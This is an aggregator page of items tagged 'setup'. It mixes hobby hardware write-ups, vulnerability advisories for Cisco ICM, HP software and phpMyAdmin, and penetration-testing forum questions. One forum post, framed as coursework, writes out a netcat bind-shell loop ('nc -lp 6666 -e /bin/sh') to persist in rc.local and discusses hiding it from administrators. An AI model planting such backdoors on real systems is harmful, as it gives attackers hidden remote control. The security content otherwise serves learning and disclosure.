«
Expand/Collapse
29 items tagged "setup"
Related tags:
vulnerability [+],
safer use [+],
hacks [+],
service vulnerability [+],
linux kernel [+],
linux [+],
kernel setup [+],
kernel [+],
manager agent [+],
code execution [+],
code [+],
cisco icm [+],
arbitrary code [+],
system [+],
setup wizard [+],
privilege escalation vulnerability [+],
potential security vulnerability [+],
phpmyadmin [+],
multitouch [+],
interface [+],
insight [+],
home [+],
cellphones [+],
Pentesting [+],
Newbie [+],
Area [+],
xsession [+],
x setup [+],
wifi [+],
webserver setup [+],
webserver [+],
web script [+],
way [+],
volume 1 [+],
vmware [+],
universal ir [+],
thermistors [+],
theater [+],
temperature [+],
table [+],
symlink [+],
something [+],
someone [+],
setup web [+],
seth sandler [+],
seth [+],
security [+],
scripts [+],
script [+],
rig [+],
re installation [+],
raspberry [+],
quot [+],
protected [+],
power [+],
polish [+],
playstation [+],
play station 3 [+],
play station [+],
pivots [+],
ninkobb [+],
metasploit [+],
local privilege escalation [+],
lan [+],
iphone [+],
internet [+],
host [+],
harmony [+],
half a dozen [+],
hackerspace [+],
ftp server [+],
ftp [+],
frames index [+],
fan [+],
exploits [+],
escalation [+],
dorey [+],
data loggers [+],
data [+],
cubes [+],
cubecart [+],
cubbyholes [+],
cooling fan [+],
control [+],
clusters [+],
cisco unified [+],
charging station [+],
cellphone [+],
buffer overflow [+],
brute force [+],
brian dorey [+],
book shelf [+],
bones [+],
blog [+],
backdoor [+],
authentication [+],
audio feedback [+],
arbitrary web [+],
analog digital converter [+],
admin [+],
Hackerspaces [+]
-
-
5:01
»
Hack a Day
We just got a tip from [PT] that a seven part series on how to start a Hackerspace will be posted this week. The blog over at Adafruit will be publishing one installment a day. Right now the introduction (linked above) and volume 1 are available. This covers what a Hackerspace is and who you [...]
-
-
4:01
»
Hack a Day
[Brian Dorey] has been adding green power solutions to his home for some time now, and as things have progressed, he has experimented with several different iterations of data loggers. The latest system watching over his solar power setup is a Raspberry Pi armed with a custom-built I2C analog/digital converter. The Rasp Pi is responsible [...]
-
-
15:01
»
Hack a Day
Cable management can really be an eyesore, but a little creative camouflage and you can have a cellphone charging station that also serves as decoration. [Kitesurfer] wanted to use one of the cubbyholes in his new Ikea book shelf for charging but wasn’t keen on the rat’s nest of wires that would go along with [...]
-
-
14:01
»
Hack a Day
This setup will let you monitor Play Station 3 temperatures and throttle the cooling fan accordingly. [Killerbug666] based the project around an Arduino board, and the majority of the details about his setup are shared as comments in the sketch that he embedded in his post. He installed four thermistors in his PS3 on the CPU [...]
-
-
12:25
»
Hack a Day
Here is a bare-bones multitouch table setup. We looked in on [Seth Sandler's] multitouch work a few years ago when he completed the MTmini build. He’s scaling up the size a bit with the MTbiggie, and showing you how easy it is to put together. The demo rig seen above is just a couple of [...]
-
-
6:13
»
Hack a Day
If you have a reasonable home theater setup in your living room, odds are you have up to half a dozen remotes sitting around. Short of trying to get your cable receiver’s remote to control everything or laying down some cash for a Harmony remote, what’s a hacker to do? [Andrey] decided he wanted to [...]
-
-
17:54
»
SecuriTeam
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco ICM.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
17:54
»
SecuriTeam
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco Unified ICM.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
17:49
»
SecuriTeam
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco ICM.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
22:02
»
SecuriTeam
A potential security vulnerability has been identified in HP Insight Managed System Setup Wizard for Windows.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
22:02
»
SecuriTeam
A potential security vulnerability has been identified in HP Insight Managed System Setup Wizard for Windows.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
18:48
»
SecuriTeam
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco ICM.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
11:00
»
Hack a Day
This setup helps to represent data in a meaningful way to for visually impaired people. It uses a combination of physical objects to represent data clusters, and audio feedback when manipulating those objects. In the video after the break you’ll see that the cubes can orient themselves to represent data clusters. The table top acts [...]
-
-
9:08
»
remote-exploit & backtrack
I wanted to get feedback on this subject. I'm taking a class at school where we compromise a box via buffer overflow and then setup a backdoor.
One of the ways I thought of was to check rc.local for any scripts. If there was one, then I would include my backdoor in there with something like
while true; do nc -lp 6666 -e /bin/sh; done
Maybe even renaming nc as something else. But then it would be easily visible to administrators by using lsof -i or netstat -antp. So instead have the script connect to me once it gets run. But then what if the box gets rebooted only once a year. Plus lsof and netstat will still show the established connection. I wanted to see what you guys thought.
Where would you setup your backdoor and why?
-
-
18:00
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-186 - Cross-site scripting vulnerability in setup/frames/index.inc.php in the setup script in phpMyAdmin 3.x before 3.3.7 allows remote attackers to inject arbitrary web script or HTML via a server name. This upgrade provides phpmyadmin 3.3.7 which is not vulnerable for this security issue.
-
-
18:56
»
remote-exploit & backtrack
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
-
-
12:49
»
remote-exploit & backtrack
I have VMware Workstation7.bundle how can setup on live cd
used method for modify live cd secript bt4-customise.sh
how can tell command to setup to path folder "edit" , without setup on system just setup on folder "edit"
-
-
5:52
»
remote-exploit & backtrack
Hi all,
I know that we could setup web server using metsploit, But I cant access it over internet, its accessable inside LAN but not over the net.. Wondering why...
any help would be appreciated.